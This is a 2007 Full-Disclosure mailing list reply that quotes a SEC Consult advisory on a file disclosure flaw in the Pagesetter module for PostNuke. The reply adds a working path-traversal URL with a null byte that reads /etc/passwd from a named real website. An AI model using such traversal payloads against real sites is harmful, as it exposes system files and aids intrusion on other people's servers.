'Re: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure
From:       Matthew Flaschen <matthew.flaschen () gatech ! edu>
Date:       2007-02-27 9:02:05
Message-ID: 45E3F38D.9030707 () gatech ! edu
[Download RAW message or body]

[Attachment #2 (multipart/signed)]


research@sec-consult.com wrote:
> SEC Consult Security Advisory 20070226-0
> =======================================================================
> title: File Disclosure in Pagesetter for PostNuke
> program: Pagesetter page creation module
> vulnerable version: 6.2.0
> 6.3.0 beta 5
> impact: high
> homepage: http://www.elfisk.dk
> found: 2006-11-21
> by: D. Matscheko / SEC-CONSULT /
> www.sec-consult.com
> =======================================================================
> 
> vendor description:
> ---------------
> 
> Pagesetter is a publishing module that allows the PostNuke users to
> create web pages from structured data, with the data structure and
> output templates defined by the PostNuke administrator.
> 
> [Source: http://www.elfisk.dk]
> 

I think brendanb's going to be busy.

http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00



["signature.asc" (application/pgp-signature)]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic